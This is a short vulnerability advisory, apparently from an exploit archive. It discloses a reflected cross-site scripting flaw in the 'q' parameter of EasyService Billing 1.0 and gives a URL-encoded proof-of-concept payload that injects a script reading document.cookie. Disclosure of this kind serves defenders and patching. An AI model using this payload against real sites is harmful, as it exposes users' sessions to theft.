EasyService Billing 1.0 Cross-Site Scripting

2018.05.28
Credit: Divya Jain
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79

<!-- # Exploit Title: EasyService Billing 1.0 Cross-Site Scripting in 'q' Parameter # Date: 25-05-2018 # Software Link: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594 # Exploit Author: Divya Jain # Version: EasyService Billing 1.0 # CVE: CVE-2018-11443 # Category: Webapps # Severity: Medium # Tested on: KaLi LinuX_x64 # # # # # # # Proof of Concept: # /////////// // XSS // /////////// Affected Link: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q= Payload: %27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27 Parameter: q Link: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q=%27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27 ###########################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top